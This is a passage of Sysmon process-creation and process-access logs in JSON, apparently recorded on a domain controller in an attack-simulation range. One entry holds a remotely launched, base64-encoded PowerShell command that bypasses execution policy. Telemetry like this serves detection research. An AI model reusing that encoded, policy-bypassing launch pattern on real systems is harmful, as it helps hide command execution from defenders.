{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5053,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.338\r\nProcessGuid: {A837DB8D-032A-5F25-0000-0010B5C10900}\r\nProcessId: 4448\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nParentProcessId: 1328\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.338","ProcessGuid":"{A837DB8D-032A-5F25-0000-0010B5C10900}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","ParentProcessId":"1328","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5054,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-0010C2BE0900}\r\nSourceProcessId: 1328\r\nSourceThreadId: 4548\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010B5C10900}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-0010C2BE0900}","SourceProcessId":"1328","SourceThreadId":"4548","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010B5C10900}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5055,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010B5C10900}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010B5C10900}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5056,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5057,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5058,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 